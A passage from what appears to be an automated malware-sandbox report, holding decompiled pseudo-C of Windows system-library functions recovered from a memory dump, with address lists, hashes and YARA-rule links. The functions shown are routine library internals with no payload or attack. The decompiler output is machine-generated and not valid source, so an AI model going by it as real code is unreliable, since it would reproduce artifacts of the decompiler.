																				 *0x370b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x37084c0;
																			if(_t82 >=  *0x37084c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E036E9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0361922A(_t99);
										_t64 = E03637D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E036E8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x37086c0; // 0x2bb07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x37086b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x37086bc;
													_t87 = 0x37086b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03619240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x37086c4;
												_t87 = 0x37086c0;
												L27:
												E03649B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0366D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3705388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x370538c = _t51;
						goto L6;
					}
				}
			}

0x03619082
0x03619083
0x03619084
0x03619085
0x03619087
0x03619096
0x03619098
0x03619098
0x0361909e
0x036190a8
0x036190e7
0x036190e7
0x036190aa
0x036190b0
0x036190b7
0x036190bd
0x036190dd
0x036190e6
0x036190bf
0x036190bf
0x036190c7
0x036190cf
0x036190f1
0x036190f2
0x036190f4
0x036190f5
0x036190f6
0x036190f7
0x036190f8
0x036190f9
0x036190fa
0x036190fb
0x036190fc
0x036190fd
0x036190fe
0x036190ff
0x03619100
0x03619102
0x03619107
0x0361910c
0x03619110
0x03619113
0x03619115
0x03619136
0x0361913f
0x03619143
0x036737e4
0x036737e4
0x03619117
0x03619117
0x0361911d
0x00000000
0x0361911f
0x0361911f
0x03619125
0x00000000
0x03619127
0x0361912d
0x03619130
0x03619134
0x03619158
0x0361915d
0x03619161
0x03619168
0x03673715
0x0361916e
0x0361916e
0x03619175
0x03619177
0x0361917e
0x0361917f
0x03619182
0x03619182
0x03619187
0x03619187
0x0361918a
0x0361918d
0x0361918f
0x03619192
0x03619195
0x03619198
0x03619198
0x03619198
0x0361919a
0x00000000
0x00000000
0x0367371f
0x03673721
0x03673727
0x0367372f
0x03673733
0x03673735
0x03673738
0x0367373b
0x0367373d
0x03673740
0x00000000
0x03673746
0x03673746
0x03673749
0x00000000
0x0367374f
0x0367374f
0x03673751
0x03673757
0x03673759
0x0367375c
0x0367375c
0x0367375e
0x0367375e
0x03673761
0x03673764
0x00000000
0x00000000
0x03673766
0x03673768
0x036737a3
0x036737a3
0x036737a5
0x036737a7
0x036737ad
0x036737b0
0x036737b2
0x036737bc
0x036737c2
0x036737c2
0x036737b2
0x03619187
0x03619187
0x0361918a
0x0361918d
0x0361918f
0x03619192
0x03619195
0x00000000
0x03619195
0x00000000
0x0367376a
0x0367376a
0x0367376a
0x0367376c
0x0367376c
0x0367376f
0x03673775
0x00000000
0x00000000
0x03673777
0x03673779
0x03673782
0x03673787
0x03673789
0x03673790
0x03673790
0x0367378b
0x0367378b
0x0367378b
0x03673792
0x03673795
0x00000000
0x03673795
0x00000000
0x03673779
0x03673798
0x00000000
0x03673798
0x00000000
0x03673768
0x0367379b
0x0367379b
0x03673751
0x03673749
0x00000000
0x03673740
0x036191a0
0x036191a3
0x036191a9
0x036191b0
0x00000000
0x036191b0
0x03619187
0x036191b4
0x036191b4
0x036191bb
0x036191c0
0x036191c5
0x036191c7
0x036737da
0x036191cd
0x036191cd
0x036191cd
0x036191d2
0x036191d5
0x03619239
0x03619239
0x036191d7
0x036191db
0x036191e1
0x036191e7
0x036191fd
0x03619203
0x0361921e
0x03619223
0x00000000
0x03619205
0x03619205
0x03619208
0x0361920c
0x03619214
0x03619214
0x0361920c
0x036191e9
0x036191e9
0x036191ee
0x036191f3
0x036191f3
0x036191f3
0x036191e7
0x00000000
0x00000000
0x00000000
0x03619134
0x03619125
0x0361911d
0x0361914e
0x036190d1
0x036190d1
0x036190d3
0x036190d6
0x036190d8
0x00000000
0x036190d8
0x036190cf

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f566ab78fd720e65b0c53a9ba2588eb3da476e8e5a97d77eab5f04d6908ddc
Instruction ID: dab0dc8d804a1f0f0992aa22481dd812f708d158e3f4c7a8d74ccb79209bfe27
Opcode Fuzzy Hash: 10f566ab78fd720e65b0c53a9ba2588eb3da476e8e5a97d77eab5f04d6908ddc
Instruction Fuzzy Hash: D401AD72505704CFD314DB14D950B21BBE9EB46329F29406AE105CB791C7749C51CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 036E4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E036E4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03632280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03632280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x37086ac);
					E0361F900(0x37086d4, _t28);
					E0362FFB0(0x37086ac, _t28, 0x37086ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0362FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x036e401a
0x036e401e
0x036e4023
0x036e4028
0x036e4029
0x036e402b
0x036e402f
0x036e4043
0x036e4046
0x036e4051
0x036e4057
0x036e405f
0x036e4062
0x036e4067
0x036e406f
0x036e407c
0x036e407c
0x036e408c
0x036e408c
0x036e4097

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981d7d6fb416a66896ffa526cf20ac05caa5b6582e9e28195e20ca303bf7e143
Instruction ID: 7c422bf73ad08c96de918d632bbeb724a00a7d1bac20103053300b4bfad15565
Opcode Fuzzy Hash: 981d7d6fb416a66896ffa526cf20ac05caa5b6582e9e28195e20ca303bf7e143
Instruction Fuzzy Hash: D4018475201B49BFD211EB79CD84E17B7ACFB49650B010629F5088BA51CB24EC11CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 036D138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E036D138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x370d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0365FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03637D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0365B640(E03659AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x036d138a
0x036d138a
0x036d1399
0x036d13a3
0x036d13a8
0x036d13aa
0x036d13b5
0x036d13bb
0x036d13c3
0x036d13c6
0x036d13c9
0x036d13d4
0x036d13e6
0x036d13d6
0x036d13df
0x036d13df
0x036d13f1
0x036d13f2
0x036d13f4
0x036d13f9
0x036d140e

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 755a485c57eb9f1231bdfba622a2d639ecd1cf758d2ea64cbf9dce6fc30ab40b
Instruction ID: 9dc6313b7bee30c783b8e69fd2330bdf0e5d915e22837322a219c3993bf3fe28
Opcode Fuzzy Hash: 755a485c57eb9f1231bdfba622a2d639ecd1cf758d2ea64cbf9dce6fc30ab40b
Instruction Fuzzy Hash: 07015275E01318EFCB14DFA9D841EAEB7B8EF45710F00406AB904EB380DAB49E11C795

Uniqueness

Uniqueness Score: -1.00%

Function 036D14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E036D14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x370d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0365FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03637D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0365B640(E03659AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x036d14fb
0x036d14fb
0x036d150a
0x036d1514
0x036d1519
0x036d151b
0x036d1526
0x036d152c
0x036d1534
0x036d1537
0x036d153a
0x036d1545
0x036d1557
0x036d1547
0x036d1550
0x036d1550
0x036d1562
0x036d1563
0x036d1565
0x036d156a
0x036d157f

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80da3c9c559df5d7144e098d442deeaba45bf580a1a49a363843dc7711f0a02
Instruction ID: 52de2417dd7dee59094aed44d36280285e3b3a8dd00d19a84a2dd8d2bb353e08
Opcode Fuzzy Hash: c80da3c9c559df5d7144e098d442deeaba45bf580a1a49a363843dc7711f0a02
Instruction Fuzzy Hash: 8E018075A01348EBDB14DFA8D841EAEB7B8EF45710F00406AB904EB380DA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036158EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E036158EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x370d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x35f5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03615943() != 0 &&  *0x3705320 > 5) {
					E03697B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03697B5E( &_v28, _t28);
					_t11 = E03697B9C(0x3705320, 0x35fbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0365B640(_t11, _t17, _v8 ^ _t29, 0x35fbf15, _t27, _t28);
			}

0x036158fb
0x036158fe
0x03615906
0x0361590a
0x0361593c
0x0361593c
0x0361590c
0x0361590c
0x03615911
0x00000000
0x03615913
0x03615913
0x03615913
0x03615911
0x0361591d
0x03671035
0x0367103c
0x0367103f
0x03671056
0x03671056
0x0361593b

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7efd5f104feea7a3dc8c1b6a14f3b5bc74ae5560f991cc0db798bbe2cfdcd0a7
Instruction ID: 7d3f749d08abad2253434c7e150fb7654f272fb8c8a85deaa7ea0a9bfa667b9a
Opcode Fuzzy Hash: 7efd5f104feea7a3dc8c1b6a14f3b5bc74ae5560f991cc0db798bbe2cfdcd0a7
Instruction Fuzzy Hash: 9701F231B00248DBCB14EF79D9009AEF7BCEF86130F8D446EAA069B284DE30DD02C695

Uniqueness

Uniqueness Score: -1.00%

Function 036CFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E036CFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x370d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0365FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03637D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0365B640(E03659AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x036cfe3f
0x036cfe3f
0x036cfe4e
0x036cfe58
0x036cfe5d
0x036cfe5f
0x036cfe6a
0x036cfe72
0x036cfe75
0x036cfe78
0x036cfe83
0x036cfe95
0x036cfe85
0x036cfe8e
0x036cfe8e
0x036cfea0
0x036cfea1
0x036cfea3
0x036cfea8
0x036cfebd

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7eb279a2ad96dd1c85a80e2019609bcf4459581074e75886527e8d8ac8a7872
Instruction ID: 1c28460e6169b46c1358960b881594292bb8de828b6e505b0a48cedc55d25801
Opcode Fuzzy Hash: f7eb279a2ad96dd1c85a80e2019609bcf4459581074e75886527e8d8ac8a7872
Instruction Fuzzy Hash: 45018475E01358EBCB14EFA9D845FBEB7B8EF44710F00406AB900AF381DA749A01C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 036CFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E036CFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x370d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0365FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03637D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0365B640(E03659AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x036cfec0
0x036cfec0
0x036cfecf
0x036cfed9
0x036cfede
0x036cfee0
0x036cfeeb
0x036cfef3
0x036cfef6
0x036cfef9
0x036cff04
0x036cff16
0x036cff06
0x036cff0f
0x036cff0f
0x036cff21
0x036cff22
0x036cff24
0x036cff29
0x036cff3e

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a3aeb2aa52b7459440d30a934b2bd0125e6de54911ef4f53a2795726c021b98
Instruction ID: 49aac56e9713be134eb55f0679c1ab3f453974dcf46dbdd818e569f31c69b574
Opcode Fuzzy Hash: 2a3aeb2aa52b7459440d30a934b2bd0125e6de54911ef4f53a2795726c021b98
Instruction Fuzzy Hash: CC018475E01348ABCB14DBA9D845FBEB7B8EF45710F00406AB900AF390DA74DA01C799

Uniqueness

Uniqueness Score: -1.00%

Function 036E1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036E1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E036E165E(__ebx, 0x3708ae4, (__edx -  *0x3708b04 >> 0x14) + (__edx -  *0x3708b04 >> 0x14), __edi, __ecx, (__edx -  *0x3708b04 >> 0x14) + (__edx -  *0x3708b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E036DAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03637D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E036CFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x036e1074
0x036e1080
0x036e1082
0x036e108a
0x036e108f
0x036e1093
0x036e10ab
0x036e10ab
0x036e10c3
0x036e10cf
0x036e10e1
0x036e10d1
0x036e10da
0x036e10da
0x036e10e9
0x036e10f5
0x036e10f5
0x036e10fe

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a4ce92f0c7901feadf3483d8450f846ac994b304cb9e2448870107ae6483df
Instruction ID: 4f08fab7da32979b14896809c260d13a9aa2cfb2a7042f904d8aa6daecfd6a5c
Opcode Fuzzy Hash: e7a4ce92f0c7901feadf3483d8450f846ac994b304cb9e2448870107ae6483df
Instruction Fuzzy Hash: 31016472504341ABC710EB29C900B1AB7E5AB84210F088A29F89187390EE30D948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 0362B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0362B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03637D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03697016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0362b037
0x0362b039
0x0362b03b
0x0362b040
0x0367a60e
0x00000000
0x00000000
0x0367a61d
0x0362b04b
0x0362b04e
0x0367a627
0x0367a634
0x00000000
0x00000000
0x0367a641
0x0367a653
0x0367a643
0x0367a64c
0x0367a64c
0x0367a65b
0x00000000
0x00000000
0x00000000
0x0367a66c
0x0362b057
0x0362b057
0x0362b057
0x0362b046
0x0362b046
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 1d6ec29fd942c63db18287438856ed99af133a66a97ad0658e269a8b8b003741
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 58017171204A849FD326C75CCA44F6A7BECEB45650F0E00A1E915CB751D628DC41CA24

Uniqueness

Uniqueness Score: -1.00%

Function 036E8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E036E8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x370d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03637D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0365B640(E03659AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x036e8a62
0x036e8a71
0x036e8a79
0x036e8a82
0x036e8a85
0x036e8a89
0x036e8a8c
0x036e8a8f
0x036e8a92
0x036e8a95
0x036e8a9f
0x036e8ab1
0x036e8aa1
0x036e8aaa
0x036e8aaa
0x036e8abc
0x036e8abd
0x036e8abf
0x036e8ac4
0x036e8ada

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0807f4bb39fda4d48ec892aed891ba62a3f3336873d084fc4af28cf219014ff7
Instruction ID: ef8265a82543d47985858a599ba207de3f80ab77d7435d7469451625a4d88316
Opcode Fuzzy Hash: 0807f4bb39fda4d48ec892aed891ba62a3f3336873d084fc4af28cf219014ff7
Instruction Fuzzy Hash: 15012CB5A0131DAFCB04DFA9D9419AEB7B8EF48710F10406AF904EB341DB74A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 036E8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E036E8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x370d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03637D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0365B640(E03659AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x036e8ed6
0x036e8ee5
0x036e8eed
0x036e8ef0
0x036e8efa
0x036e8f03
0x036e8f0c
0x036e8f15
0x036e8f24
0x036e8f27
0x036e8f31
0x036e8f43
0x036e8f33
0x036e8f3c
0x036e8f3c
0x036e8f4e
0x036e8f4f
0x036e8f51
0x036e8f56
0x036e8f69

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131e2503add59425e853894e7dca0f6552d32776406958710e519d5fa3a4c80f
Instruction ID: 30f864ee6377dd7585d21977c30b6abc6137ad61688dcbce9fd8dbcfc0e1174a
Opcode Fuzzy Hash: 131e2503add59425e853894e7dca0f6552d32776406958710e519d5fa3a4c80f
Instruction Fuzzy Hash: 22110C74A01209DFDB04DFA8D541AAEF7F4FB08700F0442AAE918EB381E6349941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0361DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0361DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0361DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0361E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0361E8B0(__ecx, _t14, 0xfff);
